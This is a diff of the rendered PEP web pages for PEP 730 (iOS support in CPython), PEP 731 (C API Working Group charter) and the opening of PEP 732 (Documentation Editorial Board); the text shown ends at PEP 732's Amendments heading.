This PEP proposes adding iOS as a supported platform in CPython. The initial +goal is to achieve Tier 3 support for Python 3.13. This PEP describes the +technical aspects of the changes that are required to support iOS. It also +describes the project management concerns related to adoption of iOS as a Tier 3 +platform.

+
+
+

Motivation

+

Over the last 15 years, mobile platforms have become increasingly important +parts of the computing landscape. iOS is one of two operating systems that +control the vast majority of these devices. However, there is no official +support for iOS in CPython.

+

The BeeWare Project and Kivy +have both supported iOS for almost 10 years. This support has been able to +generate applications that have been accepted for publication in the iOS App +Store. This demonstrates the technical feasibility of iOS support.

+

It is important for the future of Python as a language that it can be used on any hardware or OS that has widespread adoption. If Python cannot be used on a platform that has widespread use, adoption of the language will be impacted, as potential users will adopt other languages that do provide support for these platforms.

+
+
+

Rationale

+
+

Development landscape

+

iOS provides a single API, but 2 distinct ABIs - iphoneos (physical +devices), and iphonesimulator. Each of these ABIs can be provided on +multiple CPU architectures. At time of writing, Apple officially supports +arm64 on the device ABI, and arm64 and x86_64 are supported on the +simulator ABI.

+

As with macOS, iOS supports the creation of “fat” binaries that contain multiple CPU architectures. However, fat binaries cannot span ABIs. That is, it is possible to have a fat simulator binary and a fat device binary, but it is not possible to create a single fat “iOS” binary that covers both simulator and device needs. To support distribution of a single development artefact, Apple uses an “XCframework” structure - a wrapper around multiple ABIs that implement a common API.

+

iOS runs on a Darwin kernel, similar to macOS. However, there is a need to +differentiate between macOS and iOS at an implementation level, as there are +significant platform differences between iOS and macOS.

+

iOS code is compiled for compatibility against a minimum iOS version.

+

Apple frequently refers to “iPadOS” in their marketing material. However, from a development perspective, there is no discernible difference between iPadOS and iOS. A binary that has been compiled for the iphoneos or iphonesimulator ABIs can be deployed on iPad.

+

Other Apple platforms, such as tvOS, watchOS, and visionOS, use different ABIs, +and are not covered by this PEP.

+
+
+

POSIX compliance

+

iOS is broadly a POSIX platform. However, similar to WASI/Emscripten, there are +POSIX APIs that exist on iOS, but cannot be used; and POSIX APIs that don’t +exist at all.

+

Most notable of these is the fact that iOS does not provide any form of +multiprocess support. fork and spawn both exist in the iOS API; +however, if they are invoked, the invoking iOS process stops, and the new +process doesn’t start.

+

Unlike WASI/Emscripten, threading is supported on iOS.

+

There are also significant limits to socket handling. Due to process sandboxing, +there is no availability of interprocess communication via socket. However, +sockets for network communication are available.

+
+
+

Dynamic libraries

+

The iOS App Store guidelines allow apps to be +written in languages other than Objective C or Swift. However, they have very +strict guidelines about the structure of apps that are submitted for +distribution.

+

iOS apps can use dynamically loaded libraries; however, there are very strict +requirements on how dynamically loaded content is packaged for use on iOS:

+
    +
  • Dynamic binary content must be compiled as dynamic libraries, not shared +objects or binary bundles.
  • +
  • They must be packaged in the app bundle as Frameworks.
  • +
  • Each Framework can only contain a single dynamic library.
  • +
  • The Framework must be contained in the iOS App’s Frameworks folder.
  • +
  • A Framework may not contain any non-library content.
  • +
+

This imposes some constraints on the operation of CPython. It is not possible to store binary modules in the lib-dynload and/or site-packages folders; they must be stored in the app’s Frameworks folder, with each module wrapped in a Framework. This also means that the common assumption that a Python module can construct the location of a binary module by using the __file__ attribute of the Python module no longer holds.

+

As with macOS, compiling a binary module that is accessible from a +statically-linked build of Python requires the use of the --undefined +dynamic_lookup option to avoid linking libpython3.x into every binary +module. However, on iOS, this compiler flag raises a deprecation warning when it +is used. A warning from this flag has been observed on macOS as well - however, +responses from Apple staff suggest that they do not intend to break the CPython +ecosystem by removing this option. As +Python does not currently have a notable presence on iOS, it is difficult to +judge whether iOS usage of this flag would fall under the same umbrella.

+
+
+

Console and interactive usage

+

Distribution of a traditional CPython REPL or interactive “python.exe” should +not be considered a goal of this work.

+

Mobile devices (including iOS) do not provide a TTY-style console. They do not +provide stdin, stdout or stderr. iOS provides a system log, and it +is possible to install a redirection so that all stdout and stderr +content is redirected to the system log; but there is no analog for stdin.

+

In addition, iOS places restrictions on downloading additional code at runtime +(as this behavior would be functionally indistinguishable from trying to work +around App Store review). As a result, a traditional “create a virtual +environment and pip install” development experience will not be viable on iOS.

+

It is possible to build a native iOS application that provides a REPL interface. This would be closer to an IDLE-style user experience; however, Tkinter cannot be used on iOS, so any app would require a ground-up rewrite. The iOS app store already contains several examples of apps in this category (e.g., Pythonista and Pyto). The focus of this work would be to provide an embedded distribution that IDE-style native interfaces could utilize, not a user-facing “app” interface to Python on iOS.

+
+
+
+

Specification

+
+

Platform identification

+
+

sys

+

sys.platform will identify as "ios" on both simulator and physical +devices.

+

sys.implementation._multiarch will describe the ABI and CPU architecture:

+
    +
  • "arm64-iphoneos" for ARM64 devices
  • +
  • "arm64-iphonesimulator" for ARM64 simulators
  • +
  • "x86_64-iphonesimulator" for x86_64 simulators
  • +
+
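A brief usage sketch, assuming the proposed identifiers are in place (on other platforms the block simply does not run):

```python
import sys

# Branch on the proposed iOS identifiers described above.
if sys.platform == "ios":
    arch, abi = sys.implementation._multiarch.split("-")
    print(f"arch={arch}, ABI={abi}")  # e.g. arch=arm64, ABI=iphoneos
```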
+
+

platform

+

platform will be modified to support returning iOS-specific details. Most of +the values returned by the platform module will match those returned by +os.uname(), with the exception of:

+
    +
  • platform.system() - "iOS" or "iPadOS" (depending on the hardware in use), instead of "Darwin"
  • +
  • platform.release() - the iOS version number, as a string (e.g., +"16.6.1"), instead of the Darwin kernel version.
  • +
+

In addition, a platform.ios_ver() method will be added. This mirrors +platform.mac_ver(), which can be used to provide macOS version information. +ios_ver() will return a namedtuple that contains the following:

+
    +
  • system - the OS name (iOS or iPadOS, depending on hardware)
  • +
  • release - the iOS version, as a string (e.g., "16.6.1").
  • +
  • model - the model identifier of the device, as a string (e.g., +"iPhone13,2"). On simulators, this will return "iPhone" or "iPad", +depending on the simulator device.
  • +
  • is_simulator - a boolean indicating if the device is a simulator.
  • +
+
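A sketch of consuming the proposed API; the values shown in the comments are illustrative:

```python
import platform
import sys

if sys.platform == "ios":
    ios = platform.ios_ver()
    print(ios.system)        # "iOS" or "iPadOS"
    print(ios.release)       # e.g. "16.6.1"
    print(ios.model)         # e.g. "iPhone13,2"; "iPhone"/"iPad" on simulators
    print(ios.is_simulator)  # True when running in a simulator
```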
+
+

os

+

os.uname() will return the raw result of a POSIX uname() call. This will +result in the following values:

+
    +
  • sysname - "Darwin"
  • +
  • release - The Darwin kernel version (e.g., "22.6.0")
  • +
+

This approach treats the os module as a “raw” interface to system APIs, and +platform as a higher-level API providing more generally useful values.
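The resulting division of responsibilities, using the illustrative values from above:

```python
import os
import platform
import sys

if sys.platform == "ios":
    print(os.uname().sysname)  # "Darwin"  (raw kernel identification)
    print(os.uname().release)  # "22.6.0"  (Darwin kernel version)
    print(platform.system())   # "iOS" or "iPadOS"
    print(platform.release())  # "16.6.1"  (iOS version)
```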

+
+
+

sysconfig

+

The sysconfig module will use the minimum iOS version as part of +sysconfig.get_platform() (e.g., "ios-12.0-arm64-iphoneos"). The +sysconfigdata_name and Config makefile will follow the same patterns as +existing platforms (using sys.platform, sys.implementation._multiarch +etc.) to construct identifiers.

+
+
+
+

Subprocess support

+

iOS will leverage the pattern for disabling subprocesses established by +WASI/Emscripten. The subprocess module will raise an exception if an attempt +is made to start a subprocess, and os.fork and os.spawn calls will raise +an OSError.
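A sketch of the expected runtime behavior; the exact exception type raised by subprocess is not pinned down here:

```python
import subprocess
import sys

if sys.platform == "ios":
    try:
        subprocess.run(["/bin/echo", "hello"])
    except Exception as exc:  # exact exception type not specified by the PEP
        print(f"subprocesses unavailable: {exc!r}")
    # os.fork() and os.spawn*() would raise OSError, per the PEP.
```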

+
+
+

Dynamic module loading

+

To accommodate iOS dynamic loading, the importlib bootstrap will be extended to add a meta path finder that can convert a request for a Python binary module into a Framework location. This finder will only be installed if sys.platform == "ios".

+

This finder will convert a Python module name (e.g., foo.bar._whiz) into a +unique Framework name by using the full module name as the framework name (i.e., +foo.bar._whiz.framework). A framework is a directory; the finder will look +for a binary named foo.bar._whiz in that directory.
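A minimal sketch of such a finder, assuming a hypothetical Frameworks path; this is illustrative, not CPython’s actual implementation:

```python
import importlib.machinery
import importlib.util
import os
import sys

class FrameworkFinder:
    """Map "foo.bar._whiz" to Frameworks/foo.bar._whiz.framework/foo.bar._whiz."""

    def __init__(self, frameworks_dir):
        self.frameworks_dir = frameworks_dir

    def find_spec(self, fullname, path=None, target=None):
        binary = os.path.join(
            self.frameworks_dir, fullname + ".framework", fullname
        )
        if not os.path.exists(binary):
            return None  # defer to the other finders on sys.meta_path
        loader = importlib.machinery.ExtensionFileLoader(fullname, binary)
        return importlib.util.spec_from_file_location(
            fullname, binary, loader=loader
        )

# The path below is hypothetical; a real app would derive it from its bundle.
if sys.platform == "ios":
    sys.meta_path.append(FrameworkFinder("/path/to/App.app/Frameworks"))
```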

+
+
+

Compilation

+

The only binary format that will be supported is a dynamically-linkable +libpython3.x.dylib, packaged in an iOS-compatible framework format. While +the --undefined dynamic_lookup compiler option currently works, the +long-term viability of the option cannot be guaranteed. Rather than rely on a +compiler flag with an uncertain future, binary modules on iOS will be linked +with libpython3.x.dylib. This means iOS binary modules will not be loadable +by an executable that has been statically linked against libpython3.x.a. +Therefore, a static libpython3.x.a iOS library will not be supported. This +is the same pattern used by CPython on Windows.

+

Building CPython for iOS requires the use of the cross-platform tooling in +CPython’s configure build system. A single configure/make/make +install pass will produce a Python.framework artefact that can be used on +a single ABI and architecture.

+

Additional tooling will be required to merge the Python.framework builds for +multiple architectures into a single “fat” library. Tooling will also be +required to merge multiple ABIs into the XCframework format that Apple uses +to distribute multiple frameworks for different ABIs in a single bundle.

+

An Xcode project will be provided for the purpose of running the CPython test suite. Tooling will be provided to automate the process of compiling the test suite binary, starting the simulator, installing the test suite, and executing it.

+
+
+

Distribution

+

Adding iOS as a Tier 3 platform only requires adding support for compiling an +iOS-compatible build from an unpatched CPython code checkout. It does not +require production of officially distributed iOS artefacts for use by end-users.

+

If/when iOS is updated to Tier 2 or 1 support, the tooling used to generate an +XCframework package could be used to produce an iOS distribution artefact. +This could then be distributed as an “embedded distribution” analogous to the +Windows embedded distribution, or as a CocoaPod or Swift package that could be +added to an Xcode project.

+
+
+

CI resources

+

Anaconda has offered to provide physical hardware to +run iOS buildbots.

+

GitHub Actions is able to host iOS simulators on their macOS machines, and the +iOS simulator can be controlled by scripting environments. The free tier +currently only provides x86_64 macOS machines; however ARM64 runners recently +became available on paid plans. +However, in order to avoid exhausting macOS runner resources, a GitHub Actions +run for iOS will not be added as part of the standard CI configuration.

+
+
+

Packaging

+

iOS will not provide a “universal” wheel format. Instead, wheels will be +provided for each ABI-arch combination.

+

iOS wheels will use tags:

+
    +
  • ios_12_0_arm64_iphoneos
  • +
  • ios_12_0_arm64_iphonesimulator
  • +
  • ios_12_0_x86_64_iphonesimulator
  • +
+

In these tags, “12.0” is the minimum supported iOS version. As with macOS, the +tag will incorporate the minimum iOS version that is selected when the wheel is +compiled; a wheel compiled with a minimum iOS version of 15.0 would use the +ios_15_0_* tags. At time of writing, iOS 12.0 exposes most significant iOS +features, while reaching near 100% of devices; this will be used as a floor for +iOS version matching.
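The wheel tag can be derived from the sysconfig platform string with the usual normalization rule (replacing "-" and "." with "_"); a sketch, where the iOS value shown is illustrative:

```python
import sysconfig

plat = sysconfig.get_platform()  # e.g. "ios-12.0-arm64-iphoneos" on iOS
tag = plat.replace("-", "_").replace(".", "_")
print(tag)                       # e.g. "ios_12_0_arm64_iphoneos"
```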

+

These wheels can include binary modules in-situ (i.e., co-located with the +Python source, in the same way as wheels for a desktop platform); however, they +will need to be post-processed as binary modules need to be moved into the +“Frameworks” location for distribution. This can be automated with an Xcode +build step.

+
+
+

PEP 11 Update

+

PEP 11 will be updated to include two of the iOS ABIs:

+
    +
  • arm64-apple-ios
  • +
  • arm64-apple-ios-simulator
  • +
+

Ned Deily will serve as the initial core team contact for these ABIs.

+

The x86_64-apple-ios-simulator target will be supported on a best-effort +basis, but will not be targeted for tier 3 support. This is due to the impending +deprecation of x86_64 as a simulation platform, combined with the difficulty of +commissioning x86_64 macOS hardware at this time.

+
+
+
+

Backwards Compatibility

+

Adding a new platform does not introduce any backwards compatibility concerns to +CPython itself.

+

There may be some backwards compatibility implications on the projects that have +historically provided CPython support (i.e., BeeWare and Kivy) if the final form +of any CPython patches don’t align with the patches they have historically used.

+

Although not strictly a backwards compatibility issue, there is a platform +adoption consideration. Although CPython itself may support iOS, if it is +unclear how to produce iOS-compatible wheels, and prominent libraries like +cryptography, Pillow, and NumPy don’t provide iOS wheels, the ability of the +community to adopt Python on iOS will be limited. Therefore, it will be +necessary to clearly document how projects can add iOS builds to their CI and +release tooling. Adding iOS support to tools like crossenv and cibuildwheel may be one way to achieve this.

+
+
+

Security Implications

+

Adding iOS as a new platform does not add any security implications.

+
+
+

How to Teach This

+

The education needs related to this PEP mostly relate to how end-users can add iOS support to their own Xcode projects. This can be accomplished with documentation and tutorials on that process. The need for this documentation will increase if/when support is raised from Tier 3 to Tier 2 or 1; however, this transition should also be accompanied by simplified deployment artefacts (such as a CocoaPod or Swift package) that are integrated with Xcode development.

+
+
+

Reference Implementation

+

The BeeWare Python-Apple-support repository contains a +reference patch and build tooling to compile a distributable artefact.

+

Briefcase provides a reference +implementation of code to execute test suites on iOS simulators. The Toga +Testbed is an example of +a test suite that is executed on the iOS simulator using GitHub Actions.

+
+
+

Rejected Ideas

+
+

Simulator identification

+

Earlier versions of this PEP suggested the inclusion of a sys.implementation._simulator attribute to identify when code is running on a device or on a simulator. This was rejected due to the use of a protected name for a public API, plus the pollution of the sys namespace with an iOS-specific detail.

+

Another proposal during discussion was to include a generic +platform.is_emulator() API that could be implemented by any platform - for +example to differentiate running on x86_64 code on ARM64 hardware, or when +running in QEMU or other virtualization methods. This was rejected on the basis +that it wasn’t clear what a consistent interpretation of “emulator” would be, or +how an emulator would be detected outside of the iOS case.

+

The decision was made to keep this detail iOS-specific, and include it on the +platform.ios_ver() API.

+
+
+

GNU compiler triples

+

autoconf requires the use of a GNU compiler triple to identify build and host platforms. However, the autoconf toolchain doesn’t provide native support for iOS simulators, so we are left with the task of working out how to squeeze iOS hardware into GNU’s naming regime.

+

This can be done (with some patching of config.sub), but it leads to 2 major +sources of naming inconsistency:

+
    +
  • arm64 vs aarch64 as an identifier of 64-bit ARM hardware; and
  • +
  • What identifier is used to represent simulators.
  • +
+

Apple’s own tools use arm64 as the architecture, but appear to be tolerant +of aarch64 in some cases. The device platform is identified as iphoneos +and iphonesimulator.

+

Rust toolchains use aarch64 as the architecture, with aarch64-apple-ios identifying devices and aarch64-apple-ios-sim identifying ARM64 simulators; however, they use x86_64-apple-ios (with no -sim suffix) to represent iOS simulators on x86_64 hardware.

+

The decision was made to use arm64-apple-ios and +arm64-apple-ios-simulator because:

+
    +
  1. The autoconf toolchain already contains support for ios as a platform +in config.sub; it’s only the simulator that doesn’t have a representation.
  2. +
  3. The third part of the host triple is used as sys.platform.
  4. +
  5. When Apple’s own tools reference CPU architecture, they use arm64, and +the GNU tooling usage of the architecture isn’t visible outside the build +process.
  6. +
  7. When Apple’s own tools reference simulator status independent of the OS +(e.g., in the naming of Swift submodules), they use a -simulator suffix.
  8. +
  9. While some iOS packages will use Rust, all iOS packages will use Apple’s +tooling.
  10. +
+

The initially accepted version of this document used the aarch64 form as the PEP 11 identifier; this was corrected during finalization.

+
+
+

“Universal” wheel format

+

macOS currently supports 2 CPU architectures. To aid the end-user development +experience, Python defines a “universal2” wheel format that incorporates both +x86_64 and ARM64 binaries.

+

It would be conceptually possible to offer an analogous “universal” iOS wheel +format. However, this PEP does not use this approach, for 2 reasons.

+

Firstly, the experience on macOS, especially in the numerical Python ecosystem, +has been that universal wheels can be exceedingly difficult to accommodate. +While native macOS libraries maintain strong multi-platform support, and Python +itself has been updated, the vast majority of upstream non-Python libraries do +not provide multi-architecture build support. As a result, compiling universal +wheels inevitably requires multiple compilation passes, and complex decisions +over how to distribute header files for different architectures. As a result of +this complexity, many popular projects (including NumPy and Pillow) do not +provide universal wheels at all, instead providing separate ARM64 and x86_64 +wheels.

+

Secondly, historical experience is that iOS would require a much more fluid +“universal” definition. In the last 10 years, there have been at least 5 +different possible interpretations of “universal” that would apply to iOS, +including various combinations of armv6, armv7, armv7s, arm64, x86 and x86_64 +architectures, on device and simulator. If defined right now, “universal-iOS” +would likely include x86_64 and arm64 on simulator, and arm64 on device; +however, the pending deprecation of x86_64 hardware would add another +interpretation; and there may be a need to add arm64e as a new device +architecture in the future. Specifying iOS wheels as single-platform-only means +the Python core team can avoid an ongoing standardization discussion about the +updated “universal” formats.

+

It also means wheel publishers are able to make per-project decisions over which +platforms are feasible to support. For example, a project may choose to drop +x86_64 support, or adopt a new architecture earlier than other parts of the +Python ecosystem. Using platform-specific wheels means this decision can be left +to individual package publishers.

+

This decision comes at cost of making deployment more complicated. However, +deployment on iOS is already a complicated process that is best aided by tools. +At present, no binary merging is required, as there is only one on-device +architecture, and simulator binaries are not considered to be distributable +artefacts, so only one architecture is needed to build an app for a simulator.

+
+
+

Supporting static builds

+

While the long-term viability of the --undefined dynamic_lookup option +cannot be guaranteed, the option does exist, and it works. One option would be +to ignore the deprecation warning, and hope that Apple either reverses the +deprecation decision, or never finalizes the deprecation.

+

Given that Apple’s decision-making process is entirely opaque, this would be, at +best, a risky option. When combined with the fact that the broader iOS +development ecosystem encourages the use of frameworks, there are no legacy uses +of a static library to consider, and the only benefit to a statically-linked iOS +libpython3.x.a is a very slightly reduced app startup time, omitting support +for static builds of libpython3.x seems a reasonable compromise.

+

It is worth noting that there has been some discussion on an alternate approach +to linking on macOS that +would remove the need for the --undefined dynamic_lookup option, although +discussion on this approach appears to have stalled due to complications in +implementation. If those complications were to be overcome, it is highly likely +that the same approach could be used on iOS, which would make a statically +linked libpython3.x.a plausible.

+

The decision to link binary modules against libpython3.x.dylib would complicate the introduction of static libpython3.x.a builds in the future, as the process of moving to a different binary module linking approach would require a clear way to differentiate “dynamically-linked” iOS binary modules from “static-compatible” iOS binary modules. However, given the lack of tangible benefits of a static libpython3.x.a, it seems unlikely that there will be any requirement to make this change.

+
+
+

Interactive/REPL mode

+

A traditional python.exe command line experience isn’t really viable on +mobile devices, because mobile devices don’t have a command line. iOS apps don’t +have a stdout, stderr or stdin; and while you can redirect stdout and stderr to +the system log, there’s no source for stdin that exists that doesn’t also +involve building a very specific user-facing app that would be closer to an +IDLE-style IDE experience. Therefore, the decision was made to only focus on +“embedded mode” as a target for mobile distribution.

+
+
+

x86_64 simulator support

+

Apple no longer sells x86_64 hardware. As a result, commissioning an x86_64 buildbot can be difficult. It is possible to run macOS binaries in x86_64 compatibility mode on ARM64 hardware; however, this isn’t ideal for testing purposes. Therefore, the x86_64 simulator (x86_64-apple-ios-simulator) will not be added as a Tier 3 target. It is highly likely that iOS support will work on x86_64 simulators without any modification; this only impacts the official Tier 3 status.

+
+
+

On-device testing

+

CI testing on simulators can be accommodated reasonably easily. On-device testing is much harder, as the availability of device farms that could be configured to provide buildbots or GitHub Actions runners is limited.

+

However, on-device testing may not be necessary. As a data point, Apple’s Xcode Cloud solution doesn’t provide on-device testing. They rely on the fact that the API is consistent between device and simulator, and that ARM64 simulator testing is sufficient to reveal CPU-specific issues.

+
+
+

Ordering of _multiarch tags

+

The initially accepted version of this document used <platform>-<arch> +ordering (e.g., iphoneos-arm64) for sys.implementation._multiarch (and +related values, such as wheel tags). The final merged version uses the +<arch>-<platform> ordering (e.g., arm64-iphoneos). This is for +consistency with compiler triples on other platforms (especially Linux), which +specify the architecture before the operating system.

+
+
+

Values returned by platform.ios_ver()

+

The initially accepted version of this document didn’t include a system +identifier. This was added during the implementation phase to support the implementation of platform.system().

+

The initially accepted version of this document also described that +min_release would be returned in the ios_ver() result. The final version +omits the min_release value, as it is not significant at runtime; it only +impacts on binary compatibility. The minimum version is included in the value +returned by sysconfig.get_platform(), as this is used to define wheel (and +other binary) compatibility.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0730.rst

+

Last modified: 2024-10-07 20:43:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0731/index.html b/pep-0731/index.html new file mode 100644 index 00000000000..f0e68b2c8e9 --- /dev/null +++ b/pep-0731/index.html @@ -0,0 +1,333 @@ + + + + + + + + PEP 731 – C API Working Group Charter | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 731 – C API Working Group Charter

+
+
Author:
+
Guido van Rossum <guido at python.org>, +Petr Viktorin <encukou at gmail.com>, +Victor Stinner <vstinner at python.org>, +Steve Dower <steve.dower at python.org>, +Irit Katriel <irit at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
11-Oct-2023
+
Post-History:
+
13-Oct-2023, +23-May-2024, +19-Jun-2024
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to establish the C API Working Group: +a small committee of Python core developers responsible for +overseeing and coordinating the development and maintenance of the Python C API.

+

The working group will maintain +documentation, test suites and tooling related to Python’s C API. +As delegated by the Steering Council +it is the deciding body for changes to the C API, +from the addition or removal of individual API functions, types, etc., +to the acceptance of new designs of a more or less radical nature.

+

The working group’s mandate is to represent the interests of all Python users, +but especially all maintainers of code that uses Python’s C API, +whether in the context of CPython, using an alternate Python implementation, +or using a binding framework for other programming languages (such as C++ and Rust).

+

The working group serves at the pleasure of the Python Steering Council. +This document serves as the working group’s charter.

+
+
+

Epigraph

+
+
KEEPER
+
Stop! +Who would cross the Bridge of Death must answer me these questions three, +ere the other side he see.
+
+
    +
  1. What was Python named after?
  2. +
  3. What was Python 2’s EOL?
  4. +
  5. What is the optimal strategy to evolve the CPython C API?
  6. +
+
+
LANCELOT
+
Auuuuuuuugh!
+
+
+
+

Motivation

+

Despite many discussions and in-person meetings +at core developer sprints and Language Summits, +and a thorough inventory of the problems and stakeholders of the C API, +no consensus has been reached about many contentious issues, +including, but not limited to:

+
    +
  • Conventions for designing new API functions;
  • +
  • How to deal with compatibility;
  • +
  • What’s the best strategy for handling errors;
  • +
  • The future of the Stable ABI and the Limited API;
  • +
  • Whether to switch to a handle-based API convention (and how).
  • +
+

The general feeling is that there are too many stakeholders, +proposals, requirements, constraints, and conventions, +to make progress without having a small trusted group of deciders.

+

At the 2023 Language Summit in Salt Lake City it was decided to start work on an inventory of problems. At the 2023 core developer sprint in Brno this work was more or less finished, and after a discussion it appeared that the next step was to establish a working group to ensure that we’re not stymied forever.

+

The Steering Council has +indicated +its desire to delegate decisions about the C API +to such a working group, anticipating its formal establishment.

+
+
+

Specification

+

We propose the creation of a new group, the C API Working Group. +This group will be responsible for overseeing and coordinating the development and +maintenance of the Python C API. +It will do this by establishing the principles underpinning the work +and publishing guidelines that the core developers can refer to.

+

The “operations and process” section below describes +how the working group operates and how it is governed.

+
+

Members

+

The members of the working group are:

+
    +
  • Erlend Aasland
  • +
  • Michael Droettboom
  • +
  • Petr Viktorin
  • +
  • Serhiy Storchaka
  • +
  • Steve Dower
  • +
  • Victor Stinner
  • +
+
+
+

Mandate

+

The working group’s mandate is to ensure that the Python C API +is suitable for all users of and contributors to the API, +without unduly preferencing one group over another. +The working group will identify exemplar stakeholders, +their needs and preferences, +and will determine a plan for meeting these needs equitably and sustainably. +It will oversee execution of the plan.

+
+
+

Operations and process

+

The working group has at least three members, all of them prominent Python core developers. The members should consider the needs of the various stakeholders carefully.

+

The Steering Council appoints the initial working group. +There is no term limit for working group members. +Working group members may resign their position at any time, for any reason. +There is an expectation that the membership will change over time.

+

To determine replacements, +nominations will be collected from the core developer community. +Self-nominations are allowed. +The existing working group will then decide the replacement member(s) +from the nominees. +The expectation is that this will be done by fiat, +but the working group can choose a replacement by any means they see fit, +including a vote.

+

The working group remains accountable to the Steering Council. +At any point, for any reason, the Steering Council could +(publicly or privately) make a specific change +or request a non-specific change to the composition of the working group.

+

We acknowledge that this is not a particularly democratic structure +and puts a lot of faith in the working group. +However, the Python community has a long history of success +with structures that are not fully democratic! +We believe that self-governance, cycling of membership, +and accountability to the Steering Council will be sufficient +to ensure that the C API workgroup is meeting the needs of the community.

+

The working group may operate primarily through reviews of GitHub issues and PRs. +Regular meetings are likely not necessary, +but the working group may set up video calls, +a private chat, or whatever other mechanism they decide upon internally.

+

The working group should aim for transparency, +posting all decisions publicly on +discuss.python.org, +with a rationale if possible. +Before making a decision, the working group should give +all interested community members +(as examples of different categories of stakeholders) +a chance to weigh in. +There should be at least a week between the start of a discussion +and the working group’s decision.

+
+

Relationship with the Steering Council

+

Just like today, the Python Steering Council remains responsible +for the overall direction of the Python C API +and continues to decide on PEPs related to the C API, +using the standard PEP review process (community discussion, etc.). +The C API working group provides written opinions and +recommendations to the Steering Council on PEPs related to the C API.

+

However, the working group can make smaller C API changes directly. +The Steering Council may also choose to delegate decisions on some PEPs +to the working group (exactly as any other PEP delegation).

+
+
+
+

Amendments

+

This PEP serves as a charter for the working group. +Changes to its operation can be made either through a new PEP +or through a change to this PEP. +In either case, the change will be decided upon +by the Steering Council after discussion in the community.

+
+
+
+

Contact

+

To ask the C API Working Group for a decision, +community members may open an issue in the +capi-workgroup/decisions +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0731.rst

+

Last modified: 2024-06-27 15:01:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0732/index.html b/pep-0732/index.html new file mode 100644 index 00000000000..8c1cd7c6b63 --- /dev/null +++ b/pep-0732/index.html @@ -0,0 +1,345 @@ + + + + + + + + PEP 732 – The Python Documentation Editorial Board | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 732 – The Python Documentation Editorial Board

+
+
Author:
+
Joanna Jablonski
+
Sponsor:
+
Mariatta Wijaya
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
14-Oct-2023
+
Post-History:
+
20-Oct-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP:

+
    +
  • Establishes the Python Documentation Editorial Board
  • +
  • Proposes how the editorial board will work
  • +
+
+
+

Motivation

+

The Steering Council approved the creation of a Documentation Working Group in March 2021 to set direction for the docs. This group is now called the Editorial Board, to differentiate it from the Documentation Working Group that has since been created to focus on more tactical work.

+

The purpose of the Python documentation is to serve the +present and future end users of Python. As such, the core +development community and the greater Python documentation +contributors work together to achieve this:

Three concentric circles. At the centre: the Documentation Editorial Board, a trusted group. Around this: the Documentation Working Group, volunteers who contribute to the docs. Finally, the outer circle is the world, which includes the readers of the documentation.
+
+

Specification

+
+

Mandate

+

The editorial board will:

+
    +
  • Ensure processes are in place to maintain and improve the quality of Python’s documentation
  • +
  • Foster Python documentation as a community resource to serve the current and future users
  • +
  • Act in alignment with the Python Software Foundation mission, which is to advance the Python +programming language, and to support and facilitate the growth of a diverse +and international community of Python programmers
  • +
  • Ensure that contributing to documentation is accessible, inclusive, and sustainable
  • +
  • Establish appropriate decision-making processes for documentation content
  • +
  • Seek to achieve consensus among contributors prior to making decisions
  • +
  • Be the final arbiter for documentation content decisions
  • +
+
+
+

Responsibilities

+

The board has authority to make decisions about Python’s +documentation, as scoped below. For example, it can:

+
    +
  • Set big-picture strategy for Python’s documentation
  • +
  • Set the intended structure for documentation
  • +
  • Make style and editorial decisions for both writing and design
  • +
  • Handle documentation governance (for example, delegation of decision-making +to subject-matter experts, resolution of disagreements, decisions.)
  • +
+
+
+

Scope

+

The Editorial board oversees the content and strategy for the following:

In scope                                 | Not in scope
-----------------------------------------|------------------------------------
CPython documentation (docs.python.org)  | Code comments in CPython codebase
CPython devguide (devguide.python.org)   | CPython docstrings
Translations of CPython docs             | PEPs (peps.python.org)
                                         | PyPA documentation
                                         | www.python.org
                                         | The Python Wiki (wiki.python.org)
+
+

Composition

+

The Python Documentation Editorial Board is composed of five members.

+
+
+

Editorial Board Members

+

The initial Editorial Board members are:

+
    +
  • Mariatta Wijaya
  • +
  • Ned Batchelder
  • +
  • Joanna Jablonski
  • +
  • Guido van Rossum
  • +
  • Carol Willing
  • +
+
+
+

Editorial Board Member Qualifications

+

Editorial board members should have:

+
    +
  • A good grasp of the philosophy of the Python project
  • +
  • A background in Python education and developer-facing documentation
  • +
  • A solid track record of being constructive and helpful
  • +
  • A history of making significant contributions to Python
  • +
  • A willingness to dedicate time to improving Python’s docs
  • +
+

Members of the Editorial Board should have experience in education, +communication, technical writing, Python’s documentation, accessibility, +translation, or community management.

+
+
+

Term

+

Editorial Board members serve for an indefinite term, though it is +generally expected that there will be changes in Editorial Board +composition each year. Editorial Board members will confirm annually +whether they wish to continue as a board member. Members may resign +at any time.

+

If a board member drops out of touch and cannot be contacted for a +month or longer, then the rest of the board may vote to replace them.

+
+
+

Changes to the Editorial Board’s Size

+

Annually after each major Python release, the Editorial Board will +review whether the board’s size should change. This provides +flexibility if the needs of the documentation community change +over time. A simple majority is needed to make a decision to +increase the board’s size where quorum is 80% of the current board.

+

As the sponsoring organization of the Documentation Editorial +Board, the Steering Council may change the number of members of +the Board at any time, including appointing new members or +dismissing existing members.

+
+
+

Vacancies

+

If a vacancy exists on the board for any reason, the Documentation +Editorial Board will publicly announce a call for prospective +board members. Prospective board members would submit a brief +document stating qualifications and their motivation to serve. +The sitting members of the Editorial Board will select new board +members by a simple majority where quorum is 80% of the current board.

+
+
+
+
+

Amendments

+

